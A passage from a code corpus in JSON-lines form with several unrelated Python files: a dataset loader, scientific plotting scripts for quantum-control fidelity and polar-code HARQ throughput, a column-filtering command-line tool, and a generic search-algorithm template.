filename_all[:size]\r\n else:\r\n self.filename_all = filename_all\r\n \r\n if transform:\r\n self.transform = transform\r\n else:\r\n self.transform = transform_default\r\n \r\n \r\n def __len__(self):\r\n return len(self.filename_all)\r\n \r\n def __getitem__(self, idx):\r\n filename = os.path.basename(self.filename_all[idx])\r\n image = Image.open(self.filename_all[idx])\r\n image = self.transform(image)\r\n sample = {'image': image, 'filename': filename}\r\n return sample","sub_path":"src/anomaly_detection/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"562932826","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 8 10:51:40 2018\n\n@author: tejas.shetty\n\"\"\"\n\n# import numpy as np\n# import matplotlib.pyplot as plt\n# from pylab import plot, show\nfrom numpy import pi, linspace\nfrom matplotlib.pyplot import figure, plot, xlabel, ylabel, title\nfrom matplotlib.pyplot import savefig, show\nfrom dressedcrab import dcrab\nfrom parameters import tmax, Nt\n\nmax_num_runs = 5\nNc = 3\nwmax = pi\nbulim = linspace(0.1, 1, 20) # [1,1e-3]#0.1creates errors\n# bulim = [1,1e-6]\ncounter = 0\nfido = []\nfor ulim in bulim:\n print(\"counter\", counter)\n optimab, optimw, final_fidelity = \\\n dcrab(max_num_runs, Nc, ulim, wmax, counter)\n time = linspace(0, tmax, Nt)\n fido.append(final_fidelity)\n\n# plt.figure(counter + 1)\n# plot(optima)\n# show()\n# ylabel = (\"optima\")\n# plt.figure(counter+2)\n# plot(optimb)\n# show()\n# ylabel = (\"optimb\")\n# plt.figure(counter +3)\n# plot(optimw)\n# show()\n# ylabel = (\"optimw\")\n counter += 1\n\n\nfigure(counter+1)\nplot(bulim, fido)\nxlabel('ulim')\nylabel('fidelity')\nplot_name = 'Plot of fidelity versus ulim'\ntitle(plot_name)\nshow()\nsavefig('fid_vs_ulim.png')\n\n\n'''\nNum_runs = 5\nNc =3\nulim =1\nwmax = np.pi\noptima, optimb, optimw, optimab = DCRAB(Num_runs,Nc,ulim,wmax)\n'''\n","sub_path":"ulim2plots.py","file_name":"ulim2plots.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"643575082","text":"#!/usr/bin/env python3\n\n'''\n ColumnSelector\n\n @Author: wavefancy@gmail.com\n @Version: 1.0\n\n @Algorithms\n 1. Select or remove lines according to the values of specified column.\n\n @Version 2.0\n 1. Add function to copy comments line, comments started by #.\n\n @Version 3.0\n 1. Add function to read keys from file.\n'''\nimport sys\nfrom signal import signal, SIGPIPE, SIG_DFL\nsignal(SIGPIPE,SIG_DFL) #prevent IOError: [Errno 32] Broken pipe. If pipe closed by 'head'.\n\ndef help():\n sys.stderr.write('''\n -------------------------------------\n ColumnSelector\n -------------------------------------\n\n @Author: wavefancy@gmail.com\n @Version: 3.0\n\n @Usages:\n para1: Column index to compare with keys.\n para2: k|r, keep or remove those lines which indicated by keys.\n para3-n: keys. (the logic between them is OR)\n para[-f keyfile, optional]: read keys from 'keyfile'.\n\n @Optional:\n -c : Directly copy comment line to stdout, no action performed, comments started by #.\n\n @Notes:\n 1. Read input from stdin, and output to stdout.\n 2. Case sensitive for keys. The column value equals one of the keys will return true.\n 4. Column index starts from 1.\n -------------------------------------\n \\n''')\n sys.stderr.close()\n sys.exit(-1)\n\nif __name__ == '__main__':\n args = []\n copyComments = False\n keyFile = ''\n i = 0\n while i < len(sys.argv): # parse parameters.\n if sys.argv[i] == '-c':\n copyComments = True\n elif sys.argv[i] == '-f':\n i += 1\n keyFile = sys.argv[i]\n else:\n args.append(sys.argv[i])\n i += 1\n\n sys.argv = args\n if len(sys.argv) < 2:\n help()\n\n col_index = int(sys.argv[1]) -1\n action = True # True keep, false remove.\n if sys.argv[2] == 'r':\n action = False\n\n #read key sets.\n keys = set()\n if keyFile:\n with open(keyFile, 'r') as kFile:\n for line in kFile:\n line = line.strip()\n if line:\n keys.add(line)\n #read keys from arguments.\n keys = keys.union(set(sys.argv[2:]))\n else:\n keys = set(sys.argv[3:])\n\n for line in sys.stdin:\n line = line.strip()\n if line :\n if copyComments and line.startswith('#'):\n sys.stdout.write('%s\\n'%(line))\n continue\n\n ss = line.split(None,col_index+1)\n\n if action: #keep\n if ss[col_index] in keys:\n sys.stdout.write('%s\\n'%(line))\n else:\n if ss[col_index] not in keys:\n sys.stdout.write('%s\\n'%(line))\n\n\nsys.stdout.flush()\nsys.stdout.close()\nsys.stderr.flush()\nsys.stderr.close()\n","sub_path":"mx_tools/ColumnSelector.py","file_name":"ColumnSelector.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"245046310","text":"from abc import ABC, abstractmethod\nfrom heapq import heappop, heappush\nfrom typing import Optional, Callable, List, Iterable, Set, Generic, TypeVar, cast, Any\nfrom copy import copy\nfrom pytictoc import TicToc\nfrom threading import Timer\n\nT = TypeVar('T')\nclass StateNode(ABC, Generic[T]):\n \"\"\"Generic definition of a state node in the search space.\n Stores the actual state representation, cost and it parent.\n It is an abstract class and MUST be implemented for your \n specific problem.\n\n Attributes:\n depth (int): Depth in the current path.\n state (T): Problem state representation.\n parent (StateNode): Previous state. Defaults to None.\n cost (int): Cost of reaching the current state.\n heuristic_cost (int): Heuristic of the current state.\n final_cost (int): The cost and the heuristic summed up.\n \"\"\"\n\n def __init__(self, state: T, parent: Optional['StateNode'] = None):\n \"\"\"\n Args:\n state (T): Problem state representation.\n parent (StateNode): Previous state. Defaults to None.\n \"\"\"\n\n self.depth: int = 0 if parent == None else cast('StateNode', parent).depth + 1\n\n self.state = state\n self.parent = parent\n self.cost = self.arc_cost_fn()\n self.heuristic_cost = self.heuristic_fn()\n self.final_cost = self.cost + self.heuristic_cost\n\n @abstractmethod\n def next_states(self, *args, **kwargs) -> Iterable:\n \"\"\"Generates the successor states of the current one.\n Should be implemented for a specific problem.\n\n Raises:\n NotImplementedError: If not implemented in a child class.\n\n Returns:\n Iterable: An iterable of the successor states.\n Generators are preferred for efficiency.\n \"\"\"\n raise NotImplementedError\n\n def state_value(self):\n return self.state\n\n def arc_cost_fn(self):\n \"\"\"Calculates the cost of traversing from the current state\n to another one. Probably you need to override it.\n\n Returns:\n int: The cost.\n \"\"\"\n return 1\n\n def heuristic_fn(self):\n \"\"\"Calculates the heuristic of the current state.\n You should override it only if you want to use A*\n or other heuristic-based algorithms.\n\n Returns:\n int: The heuristic.\n \"\"\"\n return 0\n\n def __repr__(self):\n return f\"< {'(root) ' if self.parent is None else ''}Node ({self.state}) with cost {self.cost} >\"\n\nclass Comparable(ABC):\n \"\"\"Abstract class for defining a comparable object.\n Implement __lt__ operator and the object should support\n sorting using Python's standard library.\n \"\"\"\n\n @abstractmethod\n def __lt__(self, value):\n raise NotImplementedError\n\nclass Hashable(ABC):\n \"\"\"Abstract class for defining a hashable object.\n Implement hexdigest_internal for your custom object.\n This class comes with caching preimplemented.\n \"\"\"\n\n @abstractmethod\n def hexdigest_internal(self):\n raise NotImplementedError\n\n def hexdigest(self):\n if not hasattr(self, 'cached_hash'):\n self.cached_hash = self.hexdigest_internal()\n return self.cached_hash\n\nclass PathIterator:\n \"\"\"Iterator for traversing a path of StateNode objects.\n It traverses backwards from the leaf to the root.\n \"\"\"\n\n NODE_MODE = lambda node: node\n STATE_ONLY_MODE = lambda node: node.state \n\n def __init__(self, leaf: StateNode, mode: Callable = NODE_MODE):\n \"\"\"\n Args:\n leaf (StateNode): Last node in the path.\n mode (Callable, optional): Lambda expression to extract a desired \n value from the nodes. Defaults to NODE_MODE.\n \"\"\"\n self.leaf = leaf\n self.mode = mode\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.leaf is not None:\n current = self.mode(self.leaf)\n self.leaf = self.leaf.parent\n return current\n raise StopIteration\n\nclass SearchingTemplate(ABC):\n \"\"\"Template for implementing a solver for some searching problem.\n You MUST implement a custom StateNode first to use any of the\n searching algorithms below. Some of them need Comparable or\n Hashable to be implemented for you custom StateNode.\n\n The preimplemented algorithms are:\n - BFS\n - UCS (needs Comparable)\n - A* (needs Comparable)\n - A* with open-closed lists (needs Comparable and Hashable)\n - IDA* (needs Comparable)\n\n You need to supply only the root (initial state) to each\n of those. They'll return the soultion. (if it's possible)\n \"\"\"\n\n def __init__(self, logging=False, timeout=60):\n \"\"\"\n Args:\n logging (bool, optional): If should display logging messages. Defaults to False.\n timeout (int, optional): Timeout for each algorithm. Defaults to 60.\n \"\"\"\n self.logging = logging\n self.timeout = timeout\n\n def bfs(self, root: StateNode, **kwargs) -> tuple:\n self.__log(\"Running BFS\")\n return self.__bfs_traverse(root, **kwargs)\n\n def ucs(self, root: StateNode, **kwargs) -> tuple:\n self.__log(\"Running UCS\")\n return self.__bfs_traverse(root, ordered=True, **kwargs)\n\n # same as UCS but you should pass a node comparable by f cost\n def a_star(self, root: StateNode, **kwargs) -> tuple:\n self.__log(\"Running A*\")\n return self.__bfs_traverse(root, ordered=True, **kwargs)\n\n def a_star_opt(self, root: StateNode, **kwargs) -> tuple:\n self.__log(\"Running A* open-closed\")\n return self.__bfs_traverse(root, ordered=True, open_closed=True, **kwargs)\n\n FOUND = -1\n UNINITIALIZED_MIN = -2\n\n def ida_star(self, root: StateNode, *args, **kwargs) -> tuple:\n self.__log(\"Running IDA*\")\n\n bound = root.final_cost\n stack = [root]\n all_results: list = []\n\n statistics: dict = {\n 'time': 0,\n 'max_depth': 0,\n 'times': [],\n 'max_in_memory': 1,\n 'total_states': 1,\n }\n\n timer = TicToc()\n timer.tic()\n\n timeout_exit = [False]\n def handle_timeout():\n timeout_exit[0] = True\n\n th_timer = Timer(self.timeout, handle_timeout)\n th_timer.start()\n\n if not self.initial_has_solution(root, *args, **kwargs):\n timeout_exit[0] = True\n\n while not timeout_exit[0]:\n t = self.__iter_dfs(stack, bound, timeout_exit, statistics, *args, **kwargs)\n if t == self.FOUND: \n result = self.compute_solution(stack[-1], *args, **kwargs) \n statistics['times'].append(round(timer.tocvalue(), 5))\n all_results.append(result)\n\n if self.should_exit(all_results, *args, **kwargs):\n break\n if t == self.UNINITIALIZED_MIN:\n break\n bound = t\n statistics['time'] = round(timer.tocvalue(), 5)\n self.__log(f\"Finished in {statistics['time']}s\")\n\n th_timer.cancel()\n\n return all_results, statistics\n\n def __iter_dfs(self, stack: List[StateNode], bound: int, timeout_exit: list, *args, **kwargs) -> int:\n if len(stack) == 0: return 0\n if timeout_exit[0]: return self.UNINITIALIZED_MIN\n\n statistics = args[0]\n statistics['max_in_memory'] = max(statistics['max_in_memory'], len(stack))\n\n node = stack[-1]\n\n if statistics['max_depth'] < node.depth:\n statistics['max_depth'] = node.depth\n self.__log(f\"New depth reached {statistics['max_depth']}\")\n\n if node.final_cost > bound: return node.final_cost\n if self.check_solution(node): return self.FOUND\n\n min_cost = self.UNINITIALIZED_MIN\n for next_node in node.next_states():\n statistics['total_states'] += 1\n\n stack.append(next_node)\n t = self.__iter_dfs(stack, bound, timeout_exit, statistics)\n if t == self.FOUND: return self.FOUND\n if min_cost == self.UNINITIALIZED_MIN or t < min_cost:\n min_cost = t\n stack.pop()\n return min_cost\n\n def __bfs_traverse(self, root: StateNode, ordered=False, open_closed=False, *args, **kwargs) -> tuple:\n if ordered and not isinstance(root, Comparable):\n raise Exception(f\"{root.__class__.__name__} must implement Comparable\")\n if open_closed and not isinstance(root, Hashable):\n raise Exception(f\"{root.__class__.__name__} must implement Hashable\")\n\n all_results: list = []\n queue: Queue = PriorityQueue([root]) if ordered else SimpleQueue([root])\n\n if open_closed:\n closed_list: Set[str] = set()\n\n statistics: dict = {\n 'time': 0,\n 'times': [],\n 'max_in_memory': 1,\n 'total_states': 1,\n }\n\n max_depth = 0\n\n timer = TicToc()\n timer.tic()\n timeout_exit = [False]\n\n def handle_timeout():\n timeout_exit[0] = True\n\n th_timer = Timer(self.timeout, handle_timeout)\n th_timer.start()\n\n if not self.initial_has_solution(root, *args, **kwargs):\n timeout_exit[0] = True\n\n while not timeout_exit[0] and queue.size():\n statistics['max_in_memory'] = max(statistics['max_in_memory'], queue.size())\n\n current_node: StateNode = queue.pop()\n\n if open_closed:\n current_node_hash = cast(Hashable, current_node).hexdigest()\n \n if current_node_hash in closed_list:\n continue\n \n closed_list.add(current_node_hash)\n\n if max_depth < current_node.depth:\n max_depth = current_node.depth\n self.__log(f\"New depth reached {max_depth}\")\n\n if self.check_solution(current_node, *args, **kwargs):\n result = self.compute_solution(current_node, *args, **kwargs)\n all_results.append(result)\n statistics['times'].append(round(timer.tocvalue(), 5))\n\n if self.should_exit(all_results, *args, **kwargs):\n break\n \n \n successors = current_node.next_states(*args, **kwargs)\n\n for succ in successors:\n statistics['total_states'] += 1\n if open_closed and succ.hexdigest() in closed_list:\n continue\n\n queue.push(succ)\n\n th_timer.cancel()\n\n statistics['time'] = round(timer.tocvalue(), 5)\n self.__log(f\"Finished in {statistics['time']}s\")\n\n statistics['max_depth'] = max_depth\n return (all_results, statistics)\n\n def __log(self, msg, level=\"INFO\"):\n if self.logging:\n print (f\"[{level}] {msg}\")\n\n @abstractmethod\n def initial_has_solution(self, node: StateNode, *args, **kwargs) -> bool:\n \"\"\"Checks if the initial state is valid and solvable.\n\n Args:\n node (StateNode): The node of the initial state.\n\n Returns:\n bool: True if it is solvable.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def check_solution(self, node: StateNode, *args, **kwargs) -> bool:\n \"\"\"Checks if the current node is a solution state.\n\n Args:\n node (StateNode): Current state.\n\n Returns:\n bool: True if it is.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def compute_solution(self, node: StateNode, *args, **kwargs):\n \"\"\"Computes the path of the solution.\n The node should be tested beforehand that it is a \n solution state.\n\n Args:\n node (StateNode): Solution state.\n\n Returns:\n any: Solution representation.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def should_exit(self, results, *args, **kwargs) -> bool:\n \"\"\"Checks if the goal has been reached.\n The algorithm will stop when it returns true.\n\n Args:\n results (list): Already computed solutions.\n\n Returns:\n bool: True if should stop the algorithm.\n \"\"\"\n raise NotImplementedError\n\nclass Queue(ABC, Generic[T]):\n def __init__(self, initial: List[T] = []):\n self.q = copy(initial)\n\n def size(self) -> int:\n return len(self.q)\n\n def extend(self, items: Iterable[T]):\n for item in items:\n self.push(item)\n\n @abstractmethod\n def push(self, item: T):\n raise NotImplementedError\n\n @abstractmethod\n def pop(self) -> T:\n raise NotImplementedError\n\nclass SimpleQueue(Queue):\n def push(self, item: T):\n self.q.append(item)\n\n def pop(self) -> T:\n return self.q.pop(0)\n\nclass PriorityQueue(Queue):\n def push(self, item: T):\n heappush(self.q, item)\n\n def pop(self) -> T:\n return heappop(self.q)","sub_path":"unibuc/kr/searching.py","file_name":"searching.py","file_ext":"py","file_size_in_byte":13053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"645068734","text":"from tbounds import *\n\n\n#=================================================choice of R\n#~ N=1024\n#~ p1=0.03\n#~ p2=0.11\n#~ p3=0.17\n#~ (I,Z1)=pcon.getreliability_orderZ(N,p1)\n#~ (I,Z2)=pcon.getreliability_orderZ(N,p2)\n#~ (I,Z3)=pcon.getreliability_orderZ(N,p3)\n#~ plt.plot(range(N),[10**Z for Z in Z1],\"g\",label=\"$p_1=0.03,R_1=510/1024$\")\n#~ plt.plot(range(N),[10**Z for Z in Z2],\"r\",label=\"$p_2=0.11,R_2=255/1024$\")\n#~ plt.plot(range(N),[10**Z for Z in Z3],\"b\",label=\"$p_3=0.17,R_3=170/1024$\")\n#~ #plt.plot(range(N),[10**z1-10**z2 for (z1,z2) in zip(Z1,Z2)],\"k\")\n#~ print pl.CapacityBSC(1024,p1)/3\n\n#~ plt.title(\"Choice of $R$ based on $Z(W) \\leq 5*10^{-2}$,N =1024 \\nand satisfying $R_2=R_1/2,R_3=R_1/3$ \") \n#~ plt.legend(loc=\"best\")\n#~ plt.grid(True)\n#~ print pl.CapacityBSC(1024,p2)\n#~ print pl.CapacityBSC(1024,p3)\n#~ print pl.Inversecap1024(pl.CapacityBSC(1024,p1)/3)\n#~ plt.show()\n\n#=================================================Plot PMD estimates\n#~ # PF is mismatch, pm is match\n\n#~ complist=[0.03,0.11,0.17]\n#~ p_1=complist[0]\n#~ p_2=complist[1]\n#~ p_3=complist[2]\n#~ N=1024\n#~ NR_p1=510\n#~ NR_p2=510/2\n#~ NR_p3=510/3\n\n#~ TlistANA=[1,2,4,8,16,32,64,128]\n\n\n#~ fig=plt.figure()\n#~ fig.suptitle(\"Estimation of $P_{MD},P_{F}$ for N=1024,$NR_1=$\"+str(NR_p1)+\"\\n p_1=$\"+str(p_1)+\"$p_2=$\"+str(p_2)+\"$p_3=$\"+str(p_3))\n\n#~ plt.subplot(221)\n#~ #pf1\n#~ PF1=pfunionZ(TlistANA,N,NR_p1,p_1) \n#~ pf1file=\"./simresults/polarchannel_FERvsp_FRSB0p03_510in1024_18-04-26_21-57-42.txt\"\n#~ (x,y,z)=(8,9,10)\n#~ lines=ml.getline(pf1file,[x,y,z])\n#~ Tlist=lines[0]\n#~ PF1sim=[10**e for e in lines[1]]\n#~ plt.semilogy(TlistANA,PF1,\"-r^\",label=\"Ana\")\n#~ plt.semilogy(Tlist,PF1sim,\":b^\",label=\"Sim\")\n#~ plt.grid(True)\n#~ plt.legend(loc=\"best\")\n#~ plt.ylabel('$P_{F,1}$')\n#~ plt.xlabel('$T$')\n\n#~ plt.subplot(222)\n#~ #pm1\n#~ PMD1=mdindeZ(TlistANA,N,NR_p1,p_2)\n#~ PMD11=mdmaxZ(TlistANA,N,NR_p1,p_2)\n#~ pmd1file=\"./simresults/polarchannel_FERvsp_FRSB0p11_510in1024_18-04-26_21-56-52.txt\"\n#~ (x,y,z)=(8,9,10)\n#~ lines=ml.getline(pmd1file,[x,y,z])\n#~ Tlist=lines[0]\n#~ PMD1sim=lines[2]\n#~ plt.semilogy(TlistANA,PMD1,\"-r^\",label=\"Ana\")\n#~ plt.semilogy(TlistANA,PMD11,\"-g^\",label=\"Ana-max\")\n#~ plt.semilogy(Tlist,PMD1sim,\":b^\",label=\"Sim\")\n#~ plt.legend(loc=\"best\")\n#~ plt.ylabel('$P_{MD,1}$')\n#~ plt.xlabel('$T$')\n#~ plt.grid(True)\n\n#~ plt.subplot(223)\n#~ #Pf2\n#~ PF2=pfunionZ(TlistANA,N,NR_p2,p_2)\n#~ pf2file=\"./simresults/polarchannel_FERvsp_FRSB0p11_255in1024_18-04-26_22-02-37.txt\"\n#~ (x,y,z)=(8,9,10)\n#~ lines=ml.getline(pf2file,[x,y,z])\n#~ Tlist=lines[0]\n#~ PF2sim=[10**e for e in lines[1]]\n#~ plt.semilogy(TlistANA,PF2,\"-r^\",label=\"Ana\")\n#~ plt.semilogy(Tlist,PF2sim,\":b^\",label=\"Sim\")\n#~ plt.legend(loc=\"best\")\n#~ plt.ylabel('$P_{F,2}$')\n#~ plt.xlabel('$T$')\n#~ plt.grid(True)\n\n#~ plt.subplot(224)\n#~ #pm2\n#~ PMD2=mdindeZ(TlistANA,N,NR_p2,p_3)\n#~ PMD21=mdmaxZ(TlistANA,N,NR_p2,p_3)\n#~ pmd2file=\"./simresults/polarchannel_FERvsp_FRSB0p17_255in1024_18-04-26_21-59-03.txt\"\n#~ (x,y,z)=(8,9,10)\n#~ lines=ml.getline(pmd2file,[x,y,z])\n#~ Tlist=lines[0]\n#~ PMD2sim=lines[2]\n#~ plt.semilogy(TlistANA,PMD2,\"-r^\",label=\"Ana\")\n#~ plt.semilogy(TlistANA,PMD21,\"-g^\",label=\"Ana-max\")\n#~ plt.semilogy(Tlist,PMD2sim,\":b^\",label=\"Sim\")\n#~ plt.legend(loc=\"best\")\n#~ plt.ylabel('$P_{MD,2}$')\n#~ plt.xlabel('$T$')\n#~ plt.grid(True)\n#~ plt.show()\n#========================================================= throughput analysis\n\n\n#~ complist=[0.03,0.11,0.17]\n#~ p_1=complist[0]\n#~ p_2=complist[1]\n#~ p_3=complist[2]\n#~ N=1024\n#~ NR_p1=510\n#~ NR_p2=510/2\n#~ NR_p3=510/3\n\n#~ FER3file=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T0_doiter3_18-04-26_22-04-23.txt\"\n#~ FER2file=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T0_doiter2_18-04-26_22-05-14.txt\"\n#~ FER1file=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T0_doiter1_18-04-26_22-06-46.txt\"\n\n#~ TPTfilep1=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_maxtpt510in1024_c0p03_18-04-27_14-50-18.txt\"\n#~ TPTfilep2=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_maxtpt510in1024_c0p11_18-04-27_14-48-37.txt\"\n#~ TPTfilep3=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_maxtpt510in1024_c0p17_18-04-27_14-47-21.txt\"\n\n#~ #number of p and tpt is same, dont confuse\n#~ (x,z)=(9,11)\n#~ FER1iter=np.array([10**i for i in ml.getline(FER1file,[x,z])[1]])\n#~ FER2iter=np.array([10**i for i in ml.getline(FER2file,[x,z])[1]])\n#~ FER3iter=np.array([10**i for i in ml.getline(FER3file,[x,z])[1]])\n\n\n\n#~ print FER1iter,FER2iter,FER3iter\n\n#~ TlistANA=np.arange(1,NR_p2-NR_p3,2)\n#~ PMD1=np.array(mdindeZ(TlistANA,N,NR_p1,p_2))\n#~ PMD2=np.array(mdindeZ(TlistANA,N,NR_p2,p_3))\n#~ PF1=np.array(pfunionZ(TlistANA,N,NR_p1,p_1))\n#~ PF2=np.array(pfunionZ(TlistANA,N,NR_p2,p_2))\n\n#~ FER1est=[estimateFER(TlistANA,N,NR_p1,p_1,1),estimateFER(TlistANA,N,NR_p1,p_2,1),estimateFER(TlistANA,N,NR_p1,p_3,1)]\n#~ FER2est=[estimateFER(TlistANA,N,NR_p1,p_1,2),estimateFER(TlistANA,N,NR_p1,p_2,2),estimateFER(TlistANA,N,NR_p1,p_3,2)]\n#~ FER3est=[estimateFER(TlistANA,N,NR_p1,p_1,3),estimateFER(TlistANA,N,NR_p1,p_2,3),estimateFER(TlistANA,N,NR_p1,p_3,3)]\n#~ #===============================tpt \n#~ fig=plt.figure()\n#~ plt.subplot(311)\n#~ plt.title(\"Throughput vs T\")\n#~ #for p1\n#~ E_Iterp1=(1-PF1)+2*PF1\n#~ FERp1=FER1iter[0]*(1-PF1)+FER2iter[0]*(PF1)\n#~ TPTANAp1=(NR_p1-np.array(TlistANA))*(1-FERp1)/(N*E_Iterp1)\n#~ plt.plot(TlistANA,TPTANAp1,\"-r^\",label=\"TPT-ANA,p=\"+str(p_1))\n#~ plt.plot(TlistANA[list(TPTANAp1).index(max(TPTANAp1))],max(TPTANAp1),\"ko\",label=\"max(TPT-ANA)\")\n#~ FERp1=np.multiply(FER1est[0],(1-PF1))+np.multiply(FER2est[0],(PF1))\n#~ TPTANAp1=(NR_p1-np.array(TlistANA))*(1-FERp1)/(N*E_Iterp1)\n#~ plt.plot(TlistANA,TPTANAp1,\"-c^\",label=\"TPT-FER,p=\"+str(p_1))\n#~ plt.plot(TlistANA[list(TPTANAp1).index(max(TPTANAp1))],max(TPTANAp1),\"yo\",label=\"max(TPT-FER)\")\n\n\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep1,[x,z])\n#~ plt.plot(lines[0],lines[1],\"-b^\",label=\"TPT-sim,p=\"+str(p_1))\n#~ plt.plot(lines[0][lines[1].index(max(lines[1]))],max(lines[1]),\"go\",label=\"max(TPT-sim)\")\n#~ plt.legend(loc=\"lower right\")\n#~ plt.ylabel('$TPT$')\n#~ plt.grid(True)\n\n\n#~ plt.subplot(312)\n#~ #for p=p2\n#~ E_Iterp2=PMD1+2*np.multiply(1-PMD1,1-PF2)+3*np.multiply(1-PMD1,PF2)\n#~ FERp2=FER1iter[1]*PMD1+FER2iter[1]*np.multiply(1-PMD1,1-PF2)+FER3iter[1]*np.multiply(1-PMD1,PF2)\n#~ TPTANAp2=(NR_p1-np.array(TlistANA))*(1-FERp2)/(N*E_Iterp2)\n#~ plt.plot(TlistANA,TPTANAp2,\"-r^\",label=\"TPT-ANA,p=\"+str(p_2))\n#~ plt.plot(TlistANA[list(TPTANAp2).index(max(TPTANAp2))],max(TPTANAp2),\"-ko\",label=\"max(TPT-ANA)\")\n#~ FERp2=np.multiply(FER1est[1],PMD1)+np.multiply(FER2est[1],1-PMD1,1-PF2)+np.multiply(FER3est[1],1-PMD1,PF2)\n#~ TPTANAp2=(NR_p1-np.array(TlistANA))*(1-FERp2)/(N*E_Iterp2)\n#~ plt.plot(TlistANA,TPTANAp2,\"-c^\",label=\"TPT-FER,p=\"+str(p_2))\n#~ plt.plot(TlistANA[list(TPTANAp2).index(max(TPTANAp2))],max(TPTANAp2),\"-yo\",label=\"max(TPT-FER)\")\n\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep2,[x,z])\n#~ plt.plot(lines[0],lines[1],\"-b^\",label=\"TPT-sim,p=\"+str(p_2))\n#~ plt.plot(lines[0][lines[1].index(max(lines[1]))],max(lines[1]),\"go\",label=\"max(TPT-sim)\")\n#~ plt.legend(loc=\"lower right\")\n#~ plt.ylabel('$TPT$')\n#~ plt.grid(True)\n\n\n#~ plt.subplot(313)\n#~ #for p=p3\n#~ E_Iterp3=2*(1-PMD2)+3*PMD2\n#~ FERp3=FER2iter[2]*(1-PMD2)+FER3iter[2]*PMD2\n#~ TPTANAp3=(NR_p1-np.array(TlistANA))*(1-FERp2)/(N*E_Iterp3)\n#~ plt.plot(TlistANA,TPTANAp3,\"-r^\",label=\"TPT-ANA,p=\"+str(p_3))\n#~ plt.plot(TlistANA[list(TPTANAp3).index(max(TPTANAp3))],max(TPTANAp3),\"ko\",label=\"max(TPT-ANA)\")\n#~ FERp3=np.multiply(FER2est[2],(1-PMD2))+np.multiply(FER3est[2],PMD2)\n#~ TPTANAp3=(NR_p1-np.array(TlistANA))*(1-FERp2)/(N*E_Iterp3)\n#~ plt.plot(TlistANA,TPTANAp3,\"-c^\",label=\"TPT-FER,p=\"+str(p_3))\n#~ plt.plot(TlistANA[list(TPTANAp3).index(max(TPTANAp3))],max(TPTANAp3),\"yo\",label=\"max(TPT-FER)\")\n\n\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep3,[x,z])\n#~ plt.plot(lines[0],lines[1],\"-b^\",label=\"TPT-sim,p=\"+str(p_3))\n#~ plt.plot(lines[0][lines[1].index(max(lines[1]))],max(lines[1]),\"go\",label=\"max(TPT-sim)\")\n#~ plt.legend(loc=\"lower right\")\n#~ plt.ylabel('$TPT$')\n#~ plt.xlabel('$T$')\n#~ plt.grid(True)\n\n#~ plt.show()\n\n#====================================final scheme performance\n\nfileT32=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T32_18-04-28_15-31-33.txt\"\nfileT1=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T1_18-04-28_15-29-44.txt\"\nfileT11=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T11_18-04-29_14-56-55.txt\"\nfileT8=\"/home/smart/Desktop/Project/code/Polar-slepian/V_22/simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_510in1024_T8_18-04-28_15-30-03.txt\"\ncomplist=[0.03,0.11,0.17]\nN=1024\nfig=plt.figure()\nfig.suptitle(\"HARQ schemes \\n N=1024,ED for $\\{p_1=$\"+str(np.round(complist[0],decimals=3)) +\"$,p_2=$\"+str(np.round(complist[1],decimals=3)) +\"$,p_3= $\"+str(np.round(complist[2],decimals=3))+\"$ \\}$\")\nR_p1=510\nmaxiters=3\n(x,y,z)=(9,10,11)\nT=1\nlines=ml.getline(fileT1,[x,y,z])\npoint=len(lines[0])\nMeanIters=pl.getMeanIter(ml.getline(fileT1,[13])[0],maxiters)\nplt.plot(lines[0],[float(R_p1-T)/(MeanIters[i]*N)*(1-10**lines[2][i]) for i in range(point)],'-r^',label='CB '+str(T)+'bits, $NR_1=$'+str(R_p1))\n\n\n#~ T=11\n#~ lines=ml.getline(fileT11,[x,y,z])\n#~ point=len(lines[0])\n#~ MeanIters=pl.getMeanIter(ml.getline(fileT11,[13])[0],3)\n#~ plt.plot(lines[0],[float(R_p1-T)/(MeanIters[i]*N)*(1-10**lines[2][i]) for i in range(point)],'-b^',label='CB '+str(T)+'bits, $NR_1=$'+str(R_p1))\n\nT=8\nlines=ml.getline(fileT8,[x,y,z])\npoint=len(lines[0])\nMeanIters=pl.getMeanIter(ml.getline(fileT8,[13])[0],maxiters)\nplt.plot(lines[0],[float(R_p1-T)/(MeanIters[i]*N)*(1-10**lines[2][i]) for i in range(point)],'-b^',label='CB '+str(T)+'bits, $NR_1=$'+str(R_p1))\n\n\n\nT=32\nlines=ml.getline(fileT32,[x,y,z])\npoint=len(lines[0])\nMeanIters=pl.getMeanIter(ml.getline(fileT32,[13])[0],maxiters)\nplt.plot(lines[0],[float(R_p1-T)/(MeanIters[i]*N)*(1-10**lines[2][i]) for i in range(point)],'-g^',label='CB '+str(T)+'bits, $NR_1=$'+str(R_p1))\n\n#~ T=1\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep1,[x,z])\n#~ plt.plot(complist[0],lines[1][lines[0].index(1)],\"ro\")\n#~ (x,z)=(9,-2)\n#~ 